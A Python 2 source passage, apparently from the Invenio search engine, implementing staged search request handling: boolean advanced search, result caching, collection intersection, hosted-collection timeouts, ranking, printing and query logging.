page_start(req, of, cc, aas, ln, uid, _("Search Results"), p=create_page_title_search_pattern_info(p, p1, p2, p3),
em=em)
if of.startswith("h"):
req.write(create_search_box(cc, colls_to_display, p, f, rg, sf, so, sp, rm, of, ot, aas, ln, p1, f1, m1, op1,
p2, f2, m2, op2, p3, f3, m3, sc, pl, d1y, d1m, d1d, d2y, d2m, d2d, dt, jrec, ec, action,
em
))
recID = p[12:]
if record_exists(recID) != 1:
# record does not exist
if of.startswith("h"):
write_warning(_("Requested record does not seem to exist."), req=req)
if of == "id":
return []
elif of == "intbitset":
return intbitset()
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
else:
# record does exist, so find co-cited records:
t1 = os.times()[4]
results_cocited_recIDs = map(lambda x: x[0], calculate_co_cited_with_list(int(recID)))
if results_cocited_recIDs:
t2 = os.times()[4]
cpu_time = t2 - t1
if of.startswith("h"):
req.write(print_search_info(p, f, sf, so, sp, rm, of, ot, CFG_SITE_NAME, len(results_cocited_recIDs),
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, em=em))
print_records(req, results_cocited_recIDs, jrec, rg, of, ot, ln, search_pattern=p, verbose=verbose,
sf=sf, so=so, sp=sp, rm=rm, em=em)
elif of == "id":
return results_cocited_recIDs
elif of == "intbitset":
return intbitset(results_cocited_recIDs)
elif of.startswith("x"):
print_records(req, results_cocited_recIDs, jrec, rg, of, ot, ln, search_pattern=p, verbose=verbose,
sf=sf, so=so, sp=sp, rm=rm, em=em)
else:
# the co-cited search returned nothing, so display a message:
if of.startswith("h"):
write_warning("nothing found", req=req)
if of == "id":
return []
elif of == "intbitset":
return intbitset()
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
def prs_search_hosted_collections(kwargs=None, req=None, of=None, ln=None, _=None, p=None,
p1=None, p2=None, p3=None, hosted_colls=None, f=None,
colls_to_search=None, hosted_colls_actual_or_potential_results_p=None,
verbose=None, **dummy):
hosted_colls_results = hosted_colls_timeouts = hosted_colls_true_results = None
# search into the hosted collections only if the output format is html or xml
if hosted_colls and (of.startswith("h") or of.startswith("x")) and not p.startswith("recid:"):
# hosted_colls_results : the hosted collections' searches that did not timeout
# hosted_colls_timeouts : the hosted collections' searches that timed out and will be searched later on again
(hosted_colls_results, hosted_colls_timeouts) = calculate_hosted_collections_results(req, [p, p1, p2, p3], f, hosted_colls, verbose, ln, CFG_HOSTED_COLLECTION_TIMEOUT_ANTE_SEARCH)
# successful searches
if hosted_colls_results:
hosted_colls_true_results = []
for result in hosted_colls_results:
# if the number of results is None or 0 (or False) then just do nothing
if result[1] == None or result[1] == False:
# these are the searches that returned no or zero results
if verbose:
write_warning("Hosted collections (perform_search_request): %s returned no results" % result[0][1].name, req=req)
else:
# these are the searches that actually returned results on time
hosted_colls_true_results.append(result)
if verbose:
write_warning("Hosted collections (perform_search_request): %s returned %s results in %s seconds" % (result[0][1].name, result[1], result[2]), req=req)
else:
if verbose:
write_warning("Hosted collections (perform_search_request): there were no hosted collections results to be printed at this time", req=req)
if hosted_colls_timeouts:
if verbose:
for timeout in hosted_colls_timeouts:
write_warning("Hosted collections (perform_search_request): %s timed out and will be searched again later" % timeout[0][1].name, req=req)
# we need to know for later use whether there were any hosted collections to be searched, even if in the end they were not
elif hosted_colls and ((not (of.startswith("h") or of.startswith("x"))) or p.startswith("recid:")):
(hosted_colls_results, hosted_colls_timeouts) = (None, None)
else:
if verbose:
write_warning("Hosted collections (perform_search_request): there were no hosted collections to be searched", req=req)
## let's define some useful boolean variables:
# True means there are actual or potential hosted collections results to be printed
kwargs['hosted_colls_actual_or_potential_results_p'] = not (not hosted_colls or not ((hosted_colls_results and hosted_colls_true_results) or hosted_colls_timeouts))
# True means there are hosted collections timeouts to take care of later
# (useful for more accurate printing of results later)
kwargs['hosted_colls_potential_results_p'] = not (not hosted_colls or not hosted_colls_timeouts)
# True means we only have hosted collections to deal with
kwargs['only_hosted_colls_actual_or_potential_results_p'] = not colls_to_search and hosted_colls_actual_or_potential_results_p
kwargs['hosted_colls_results'] = hosted_colls_results
kwargs['hosted_colls_timeouts'] = hosted_colls_timeouts
kwargs['hosted_colls_true_results'] = hosted_colls_true_results
def prs_advanced_search(results_in_any_collection, kwargs=None, req=None, of=None,
cc=None, ln=None, _=None, p=None, p1=None, p2=None, p3=None,
f=None, f1=None, m1=None, op1=None, f2=None, m2=None,
op2=None, f3=None, m3=None, ap=None, ec=None,
selected_external_collections_infos=None, verbose=None,
wl=None, em=None, **dummy):
len_results_p1 = 0
len_results_p2 = 0
len_results_p3 = 0
try:
results_in_any_collection.union_update(search_pattern_parenthesised(req, p1, f1, m1, ap=ap, of=of, verbose=verbose, ln=ln, wl=wl))
len_results_p1 = len(results_in_any_collection)
if len_results_p1 == 0:
if of.startswith("h"):
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec,
verbose, ln, selected_external_collections_infos, em=em)
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
return page_end(req, of, ln, em)
if p2:
results_tmp = search_pattern_parenthesised(req, p2, f2, m2, ap=ap, of=of, verbose=verbose, ln=ln, wl=wl)
len_results_p2 = len(results_tmp)
if op1 == "a": # add
results_in_any_collection.intersection_update(results_tmp)
elif op1 == "o": # or
results_in_any_collection.union_update(results_tmp)
elif op1 == "n": # not
results_in_any_collection.difference_update(results_tmp)
else:
if of.startswith("h"):
write_warning("Invalid set operation %s." % cgi.escape(op1), "Error", req=req)
if len(results_in_any_collection) == 0:
if of.startswith("h"):
if len_results_p2:
#each individual query returned results, but the boolean operation did not
nearestterms = []
nearest_search_args = req.argd.copy()
if p1:
nearestterms.append((p1, len_results_p1, clean_dictionary(nearest_search_args, ['p2', 'f2', 'm2', 'p3', 'f3', 'm3'])))
nearestterms.append((p2, len_results_p2, clean_dictionary(nearest_search_args, ['p1', 'f1', 'm1', 'p3', 'f3', 'm3'])))
write_warning(websearch_templates.tmpl_search_no_boolean_hits(ln=ln, nearestterms=nearestterms), req=req)
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
if p3:
results_tmp = search_pattern_parenthesised(req, p3, f3, m3, ap=ap, of=of, verbose=verbose, ln=ln, wl=wl)
len_results_p3 = len(results_tmp)
if op2 == "a": # add
results_in_any_collection.intersection_update(results_tmp)
elif op2 == "o": # or
results_in_any_collection.union_update(results_tmp)
elif op2 == "n": # not
results_in_any_collection.difference_update(results_tmp)
else:
if of.startswith("h"):
write_warning("Invalid set operation %s." % cgi.escape(op2), "Error", req=req)
if len(results_in_any_collection) == 0 and len_results_p3 and of.startswith("h"):
#each individual query returned results but the boolean operation did not
nearestterms = []
nearest_search_args = req.argd.copy()
if p1:
nearestterms.append((p1, len_results_p1, clean_dictionary(nearest_search_args, ['p2', 'f2', 'm2', 'p3', 'f3', 'm3'])))
if p2:
nearestterms.append((p2, len_results_p2, clean_dictionary(nearest_search_args, ['p1', 'f1', 'm1', 'p3', 'f3', 'm3'])))
nearestterms.append((p3, len_results_p3, clean_dictionary(nearest_search_args, ['p1', 'f1', 'm1', 'p2', 'f2', 'm2'])))
write_warning(websearch_templates.tmpl_search_no_boolean_hits(ln=ln, nearestterms=nearestterms), req=req)
except:
register_exception(req=req, alert_admin=True)
if of.startswith("h"):
req.write(create_error_box(req, verbose=verbose, ln=ln))
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
return page_end(req, of, ln, em)
def prs_simple_search(results_in_any_collection, kwargs=None, req=None, of=None, cc=None, ln=None, p=None, f=None,
p1=None, p2=None, p3=None, ec=None, verbose=None, selected_external_collections_infos=None,
only_hosted_colls_actual_or_potential_results_p=None, query_representation_in_cache=None,
ap=None, hosted_colls_actual_or_potential_results_p=None, wl=None, em=None,
**dummy):
try:
results_in_cache = intbitset().fastload(
search_results_cache.get(query_representation_in_cache))
except:
results_in_cache = None
if results_in_cache is not None:
        # query is already in the cache, so reuse the cached results:
results_in_any_collection.union_update(results_in_cache)
if verbose and of.startswith("h"):
write_warning("Search stage 0: query found in cache, reusing cached results.", req=req)
else:
try:
# added the display_nearest_terms_box parameter to avoid printing out the "Nearest terms in any collection"
# recommendations when there are results only in the hosted collections. Also added the if clause to avoid
# searching in case we know we only have actual or potential hosted collections results
if not only_hosted_colls_actual_or_potential_results_p:
results_in_any_collection.union_update(search_pattern_parenthesised(req, p, f, ap=ap, of=of, verbose=verbose, ln=ln,
display_nearest_terms_box=not hosted_colls_actual_or_potential_results_p,
wl=wl))
except:
register_exception(req=req, alert_admin=True)
if of.startswith("h"):
req.write(create_error_box(req, verbose=verbose, ln=ln))
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
return page_end(req, of, ln, em)
def prs_intersect_results_with_collrecs(results_final, results_in_any_collection, kwargs=None, colls_to_search=None,
req=None, ap=None, of=None, ln=None,
cc=None, p=None, p1=None, p2=None, p3=None, f=None,
ec=None, verbose=None, selected_external_collections_infos=None, em=None,
**dummy):
display_nearest_terms_box=not kwargs['hosted_colls_actual_or_potential_results_p']
try:
# added the display_nearest_terms_box parameter to avoid printing out the "Nearest terms in any collection"
        # recommendations when there are results only in the hosted collections. Also added the if clause to avoid
        # searching when we already know from the previous stage that there are no results in any collection
if len(results_in_any_collection) != 0:
results_final.update(intersect_results_with_collrecs(req, results_in_any_collection, colls_to_search, ap, of,
verbose, ln, display_nearest_terms_box=display_nearest_terms_box))
except:
register_exception(req=req, alert_admin=True)
if of.startswith("h"):
req.write(create_error_box(req, verbose=verbose, ln=ln))
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
return page_end(req, of, ln, em)
def prs_store_results_in_cache(query_representation_in_cache, results_in_any_collection, req=None, verbose=None, of=None, **dummy):
if CFG_WEBSEARCH_SEARCH_CACHE_SIZE > 0:
search_results_cache.set(query_representation_in_cache,
results_in_any_collection.fastdump(),
timeout=CFG_WEBSEARCH_SEARCH_CACHE_TIMEOUT)
search_results_cache.set(query_representation_in_cache + '::cc',
dummy.get('cc', CFG_SITE_NAME),
timeout=CFG_WEBSEARCH_SEARCH_CACHE_TIMEOUT)
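        # note: the cached hit set is read back in prs_simple_search() via
        # intbitset().fastload(search_results_cache.get(query_representation_in_cache)),
        # so the fastdump()/fastload() pair must stay symmetric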
if verbose and of.startswith("h"):
write_warning(req, "Search stage 3: storing query results in cache.", req=req)
def prs_apply_search_limits(results_final, kwargs=None, req=None, of=None, cc=None, ln=None, _=None,
p=None, p1=None, p2=None, p3=None, f=None, pl=None, ap=None, dt=None,
ec=None, selected_external_collections_infos=None,
hosted_colls_actual_or_potential_results_p=None,
datetext1=None, datetext2=None, verbose=None, wl=None, em=None,
**dummy):
if datetext1 != "" and results_final != {}:
if verbose and of.startswith("h"):
write_warning("Search stage 5: applying time etc limits, from %s until %s..." % (datetext1, datetext2), req=req)
try:
results_final = intersect_results_with_hitset(req,
results_final,
search_unit_in_bibrec(datetext1, datetext2, dt),
ap,
aptext= _("No match within your time limits, "
"discarding this condition..."),
of=of)
except:
register_exception(req=req, alert_admin=True)
if of.startswith("h"):
req.write(create_error_box(req, verbose=verbose, ln=ln))
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
return page_end(req, of, ln, em)
if results_final == {} and not hosted_colls_actual_or_potential_results_p:
if of.startswith("h"):
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
#if of.startswith("x"):
# # Print empty, but valid XML
# print_records_prologue(req, of)
# print_records_epilogue(req, of)
return page_end(req, of, ln, em)
if pl and results_final != {}:
pl = wash_pattern(pl)
if verbose and of.startswith("h"):
write_warning("Search stage 5: applying search pattern limit %s..." % cgi.escape(pl), req=req)
try:
results_final = intersect_results_with_hitset(req,
results_final,
search_pattern_parenthesised(req, pl, ap=0, ln=ln, wl=wl),
ap,
aptext=_("No match within your search limits, "
"discarding this condition..."),
of=of)
except:
register_exception(req=req, alert_admin=True)
if of.startswith("h"):
req.write(create_error_box(req, verbose=verbose, ln=ln))
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
return page_end(req, of, ln, em)
if results_final == {} and not hosted_colls_actual_or_potential_results_p:
if of.startswith("h"):
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
if of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
return page_end(req, of, ln, em)
def prs_split_into_collections(kwargs=None, results_final=None, colls_to_search=None, hosted_colls_results=None,
cpu_time=0, results_final_nb_total=None, hosted_colls_actual_or_potential_results_p=None,
hosted_colls_true_results=None, hosted_colls_timeouts=None, **dummy):
results_final_nb_total = 0
results_final_nb = {} # will hold number of records found in each collection
# (in simple dict to display overview more easily)
for coll in results_final.keys():
results_final_nb[coll] = len(results_final[coll])
#results_final_nb_total += results_final_nb[coll]
# Now let us calculate results_final_nb_total more precisely,
# in order to get the total number of "distinct" hits across
# searched collections; this is useful because a record might
# have been attributed to more than one primary collection; so
# we have to avoid counting it multiple times. The price to
# pay for this accuracy of results_final_nb_total is somewhat
# increased CPU time.
    if len(results_final) == 1:
# only one collection; no need to union them
results_final_for_all_selected_colls = results_final.values()[0]
results_final_nb_total = results_final_nb.values()[0]
else:
# okay, some work ahead to union hits across collections:
results_final_for_all_selected_colls = intbitset()
for coll in results_final.keys():
results_final_for_all_selected_colls.union_update(results_final[coll])
results_final_nb_total = len(results_final_for_all_selected_colls)
#if hosted_colls and (of.startswith("h") or of.startswith("x")):
if hosted_colls_actual_or_potential_results_p:
if hosted_colls_results:
for result in hosted_colls_true_results:
colls_to_search.append(result[0][1].name)
results_final_nb[result[0][1].name] = result[1]
results_final_nb_total += result[1]
cpu_time += result[2]
if hosted_colls_timeouts:
for timeout in hosted_colls_timeouts:
colls_to_search.append(timeout[1].name)
# use -963 as a special number to identify the collections that timed out
results_final_nb[timeout[1].name] = -963
kwargs['results_final_nb'] = results_final_nb
kwargs['results_final_nb_total'] = results_final_nb_total
kwargs['results_final_for_all_selected_colls'] = results_final_for_all_selected_colls
kwargs['cpu_time'] = cpu_time #rca TODO: check where the cpu_time is used, this line was missing
return (results_final_nb, results_final_nb_total, results_final_for_all_selected_colls)
def prs_summarize_records(kwargs=None, req=None, p=None, f=None, aas=None,
p1=None, p2=None, p3=None, f1=None, f2=None, f3=None, op1=None, op2=None,
ln=None, results_final_for_all_selected_colls=None, of='hcs', **dummy):
# feed the current search to be summarized:
from invenio.search_engine_summarizer import summarize_records
search_p = p
search_f = f
if not p and (aas == 1 or p1 or p2 or p3):
op_d = {'n': ' and not ', 'a': ' and ', 'o': ' or ', '': ''}
triples = ziplist([f1, f2, f3], [p1, p2, p3], [op1, op2, ''])
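        # triples is roughly [[f1, p1, op1], [f2, p2, op2], [f3, p3, '']],
        # e.g. [['author', 'ellis', 'a'], ['title', 'muon', ''], ['', '', '']]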
triples_len = len(triples)
for i in range(triples_len):
            fi, pi, oi = triples[i]
if i < triples_len-1 and not triples[i+1][1]: # if p2 empty
triples[i+1][0] = '' # f2 must be too
oi = '' # and o1
if ' ' in pi:
pi = '"'+pi+'"'
if fi:
fi = fi + ':'
search_p += fi + pi + op_d[oi]
search_f = ''
summarize_records(results_final_for_all_selected_colls, of, ln, search_p, search_f, req)
def prs_print_records(kwargs=None, results_final=None, req=None, of=None, cc=None, pl_in_url=None,
ln=None, _=None, p=None, p1=None, p2=None, p3=None, f=None, rg=None, sf=None,
so=None, sp=None, rm=None, ot=None, aas=None, f1=None, m1=None, op1=None,
f2=None, m2=None, op2=None, f3=None, m3=None, sc=None, d1y=None, d1m=None,
d1d=None, d2y=None, d2m=None, d2d=None, dt=None, jrec=None, colls_to_search=None,
hosted_colls_actual_or_potential_results_p=None, hosted_colls_results=None,
hosted_colls_true_results=None, hosted_colls_timeouts=None, results_final_nb=None,
cpu_time=None, verbose=None, em=None, **dummy):
if len(colls_to_search)>1:
cpu_time = -1 # we do not want to have search time printed on each collection
print_records_prologue(req, of, cc=cc)
results_final_colls = []
wlqh_results_overlimit = 0
for coll in colls_to_search:
if results_final.has_key(coll) and len(results_final[coll]):
if of.startswith("h"):
req.write(print_search_info(p, f, sf, so, sp, rm, of, ot, coll, results_final_nb[coll],
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, em=em))
results_final_recIDs = list(results_final[coll])
results_final_relevances = []
results_final_relevances_prologue = ""
results_final_relevances_epilogue = ""
if rm: # do we have to rank?
results_final_recIDs_ranked, results_final_relevances, results_final_relevances_prologue, results_final_relevances_epilogue, results_final_comments = \
rank_records(req, rm, 0, results_final[coll],
string.split(p) + string.split(p1) +
string.split(p2) + string.split(p3), verbose, so, of, ln, rg, jrec, kwargs['f'])
if of.startswith("h"):
write_warning(results_final_comments, req=req)
if results_final_recIDs_ranked:
results_final_recIDs = results_final_recIDs_ranked
else:
# rank_records failed and returned some error message to display:
write_warning(results_final_relevances_prologue, req=req)
write_warning(results_final_relevances_epilogue, req=req)
elif sf or (CFG_BIBSORT_BUCKETS and sorting_methods): # do we have to sort?
results_final_recIDs = sort_records(req, results_final_recIDs, sf, so, sp, verbose, of, ln, rg, jrec)
if len(results_final_recIDs) < CFG_WEBSEARCH_PREV_NEXT_HIT_LIMIT:
results_final_colls.append(results_final_recIDs)
else:
wlqh_results_overlimit = 1
print_records(req, results_final_recIDs, jrec, rg, of, ot, ln,
results_final_relevances,
results_final_relevances_prologue,
results_final_relevances_epilogue,
search_pattern=p,
print_records_prologue_p=False,
print_records_epilogue_p=False,
verbose=verbose,
sf=sf,
so=so,
sp=sp,
rm=rm,
em=em)
if of.startswith("h"):
req.write(print_search_info(p, f, sf, so, sp, rm, of, ot, coll, results_final_nb[coll],
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, 1, em=em))
if req and not isinstance(req, cStringIO.OutputType):
# store the last search results page
session_param_set(req, 'websearch-last-query', req.unparsed_uri)
if wlqh_results_overlimit:
results_final_colls = None
# store list of results if user wants to display hits
# in a single list, or store list of collections of records
# if user displays hits split by collections:
session_param_set(req, 'websearch-last-query-hits', results_final_colls)
#if hosted_colls and (of.startswith("h") or of.startswith("x")):
if hosted_colls_actual_or_potential_results_p:
if hosted_colls_results:
# TODO: add a verbose message here
for result in hosted_colls_true_results:
if of.startswith("h"):
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, result[0][1].name, results_final_nb[result[0][1].name],
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, em=em))
req.write(print_hosted_results(url_and_engine=result[0], ln=ln, of=of, req=req, limit=rg, em=em))
if of.startswith("h"):
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, result[0][1].name, results_final_nb[result[0][1].name],
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, 1))
if hosted_colls_timeouts:
# TODO: add a verbose message here
# TODO: check if verbose messages still work when dealing with (re)calculations of timeouts
(hosted_colls_timeouts_results, hosted_colls_timeouts_timeouts) = do_calculate_hosted_collections_results(req, ln, None, verbose, None, hosted_colls_timeouts, CFG_HOSTED_COLLECTION_TIMEOUT_POST_SEARCH)
if hosted_colls_timeouts_results:
for result in hosted_colls_timeouts_results:
if result[1] == None or result[1] == False:
                        ## these are the searches that returned no or zero results
## also print a nearest terms box, in case this is the only
## collection being searched and it returns no results?
if of.startswith("h"):
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, result[0][1].name, -963,
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time))
req.write(print_hosted_results(url_and_engine=result[0], ln=ln, of=of, req=req, no_records_found=True, limit=rg, em=em))
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, result[0][1].name, -963,
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, 1))
else:
# these are the searches that actually returned results on time
if of.startswith("h"):
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, result[0][1].name, result[1],
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time))
req.write(print_hosted_results(url_and_engine=result[0], ln=ln, of=of, req=req, limit=rg, em=em))
if of.startswith("h"):
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, result[0][1].name, result[1],
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, 1))
if hosted_colls_timeouts_timeouts:
for timeout in hosted_colls_timeouts_timeouts:
if of.startswith("h"):
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, timeout[1].name, -963,
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time))
req.write(print_hosted_results(url_and_engine=timeout[0], ln=ln, of=of, req=req, search_timed_out=True, limit=rg, em=em))
req.write(print_hosted_search_info(p, f, sf, so, sp, rm, of, ot, timeout[1].name, -963,
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, 1))
print_records_epilogue(req, of)
if f == "author" and of.startswith("h"):
req.write(create_similarly_named_authors_link_box(p, ln))
def prs_log_query(kwargs=None, req=None, uid=None, of=None, ln=None, p=None, f=None,
colls_to_search=None, results_final_nb_total=None, em=None, **dummy):
# FIXME move query logging to signal receiver
# log query:
try:
from flask.ext.login import current_user
if req:
from flask import request
req = request
id_query = log_query(req.host,
'&'.join(map(lambda (k,v): k+'='+v, request.values.iteritems(multi=True))),
uid)
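            # the second argument reconstructs the submitted query string from the
            # request values, e.g. "p=ellis&of=hb&ln=en"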
#id_query = log_query(req.remote_host, req.args, uid)
#of = request.values.get('of', 'hb')
if of.startswith("h") and id_query and (em == '' or EM_REPOSITORY["alert"] in em):
if not of in ['hcs', 'hcs2']:
# display alert/RSS teaser for non-summary formats:
display_email_alert_part = True
if current_user:
if current_user['email'] == 'guest':
if CFG_ACCESS_CONTROL_LEVEL_ACCOUNTS > 4:
display_email_alert_part = False
else:
if not current_user['precached_usealerts']:
display_email_alert_part = False
from flask import flash
flash(websearch_templates.tmpl_alert_rss_teaser_box_for_query(id_query, \
ln=ln, display_email_alert_part=display_email_alert_part), 'search-results-after')
except:
# do not log query if req is None (used by CLI interface)
pass
log_query_info("ss", p, f, colls_to_search, results_final_nb_total)
def prs_search_common(kwargs=None, req=None, of=None, cc=None, ln=None, uid=None, _=None, p=None,
p1=None, p2=None, p3=None, colls_to_display=None, f=None, rg=None, sf=None,
so=None, sp=None, rm=None, ot=None, aas=None, f1=None, m1=None, op1=None,
f2=None, m2=None, op2=None, f3=None, m3=None, sc=None, pl=None,
d1y=None, d1m=None, d1d=None, d2y=None, d2m=None, d2d=None,
dt=None, jrec=None, ec=None, action=None, colls_to_search=None, wash_colls_debug=None,
verbose=None, wl=None, em=None, **dummy):
query_representation_in_cache = get_search_results_cache_key(**kwargs)
page_start(req, of, cc, aas, ln, uid, p=create_page_title_search_pattern_info(p, p1, p2, p3), em=em)
if of.startswith("h") and verbose and wash_colls_debug:
write_warning("wash_colls debugging info : %s" % wash_colls_debug, req=req)
prs_search_hosted_collections(kwargs=kwargs, **kwargs)
if of.startswith("h"):
req.write(create_search_box(cc, colls_to_display, p, f, rg, sf, so, sp, rm, of, ot, aas, ln, p1, f1, m1, op1,
p2, f2, m2, op2, p3, f3, m3, sc, pl, d1y, d1m, d1d, d2y, d2m, d2d, dt, jrec, ec, action,
em
))
t1 = os.times()[4]
results_in_any_collection = intbitset()
if aas == 1 or (p1 or p2 or p3):
## 3A - advanced search
output = prs_advanced_search(results_in_any_collection, kwargs=kwargs, **kwargs)
if output is not None:
return output
else:
## 3B - simple search
output = prs_simple_search(results_in_any_collection, kwargs=kwargs, **kwargs)
if output is not None:
return output
if len(results_in_any_collection) == 0 and not kwargs['hosted_colls_actual_or_potential_results_p']:
if of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
return None
# store this search query results into search results cache if needed:
prs_store_results_in_cache(query_representation_in_cache, results_in_any_collection, **kwargs)
# search stage 4 and 5: intersection with collection universe and sorting/limiting
try:
output = prs_intersect_with_colls_and_apply_search_limits(results_in_any_collection, kwargs=kwargs, **kwargs)
if output is not None:
return output
except Exception: # no results to display
return None
t2 = os.times()[4]
cpu_time = t2 - t1
kwargs['cpu_time'] = cpu_time
## search stage 6: display results:
return prs_display_results(kwargs=kwargs, **kwargs)
def prs_intersect_with_colls_and_apply_search_limits(results_in_any_collection,
kwargs=None, req=None, of=None, ln=None, _=None,
p=None, p1=None, p2=None, p3=None, f=None, cc=None, ec=None,
verbose=None, em=None, **dummy):
# search stage 4: intersection with collection universe:
results_final = {}
output = prs_intersect_results_with_collrecs(results_final, results_in_any_collection, kwargs, **kwargs)
if output is not None:
return output
# another external search if we still don't have something
if results_final == {} and not kwargs['hosted_colls_actual_or_potential_results_p']:
if of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
kwargs['results_final'] = results_final
raise Exception
# search stage 5: apply search option limits and restrictions:
output = prs_apply_search_limits(results_final, kwargs=kwargs, **kwargs)
kwargs['results_final'] = results_final
if output is not None:
return output
def prs_display_results(kwargs=None, results_final=None, req=None, of=None, sf=None,
so=None, sp=None, verbose=None, p=None, p1=None, p2=None, p3=None,
cc=None, ln=None, _=None, ec=None, colls_to_search=None, rm=None, cpu_time=None,
f=None, em=None, **dummy
):
## search stage 6: display results:
# split result set into collections
(results_final_nb, results_final_nb_total, results_final_for_all_selected_colls) = prs_split_into_collections(kwargs=kwargs, **kwargs)
# we continue past this point only if there is a hosted collection that has timed out and might offer potential results
if results_final_nb_total == 0 and not kwargs['hosted_colls_potential_results_p']:
if of.startswith("h"):
write_warning("No match found, please enter different search terms.", req=req)
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
else:
prs_log_query(kwargs=kwargs, **kwargs)
# yes, some hits found: good!
# collection list may have changed due to not-exact-match-found policy so check it out:
for coll in results_final.keys():
if coll not in colls_to_search:
colls_to_search.append(coll)
# print results overview:
if of == "intbitset":
#return the result as an intbitset
return results_final_for_all_selected_colls
elif of == "id":
# we have been asked to return list of recIDs
recIDs = list(results_final_for_all_selected_colls)
if rm: # do we have to rank?
results_final_for_all_colls_rank_records_output = rank_records(req, rm, 0, results_final_for_all_selected_colls,
string.split(p) + string.split(p1) +
string.split(p2) + string.split(p3), verbose, so, of, ln, kwargs['rg'], kwargs['jrec'], kwargs['f'])
if results_final_for_all_colls_rank_records_output[0]:
recIDs = results_final_for_all_colls_rank_records_output[0]
elif sf or (CFG_BIBSORT_BUCKETS and sorting_methods): # do we have to sort?
recIDs = sort_records(req, recIDs, sf, so, sp, verbose, of, ln)
return recIDs
elif of.startswith("h"):
if of not in ['hcs', 'hcs2']:
# added the hosted_colls_potential_results_p parameter to help print out the overview more accurately
req.write(print_results_overview(colls_to_search, results_final_nb_total, results_final_nb, cpu_time,
ln, ec, hosted_colls_potential_results_p=kwargs['hosted_colls_potential_results_p'], em=em))
kwargs['selected_external_collections_infos'] = print_external_results_overview(req, cc, [p, p1, p2, p3],
f, ec, verbose, ln, print_overview=em == "" or EM_REPOSITORY["overview"] in em)
# print number of hits found for XML outputs:
if of.startswith("x") or of == 'mobb':
req.write("<!-- Search-Engine-Total-Number-Of-Results: %s -->\n" % kwargs['results_final_nb_total'])
# print records:
if of in ['hcs', 'hcs2']:
prs_summarize_records(kwargs=kwargs, **kwargs)
else:
prs_print_records(kwargs=kwargs, **kwargs)
# this is a copy of the prs_display_results with output parts removed, needed for external modules
def prs_rank_results(kwargs=None, results_final=None, req=None, colls_to_search=None,
sf=None, so=None, sp=None, of=None, rm=None, p=None, p1=None, p2=None, p3=None,
verbose=None, **dummy
):
## search stage 6: display results:
# split result set into collections
(results_final_nb, results_final_nb_total, results_final_for_all_selected_colls) = prs_split_into_collections(kwargs=kwargs, **kwargs)
# yes, some hits found: good!
# collection list may have changed due to not-exact-match-found policy so check it out:
for coll in results_final.keys():
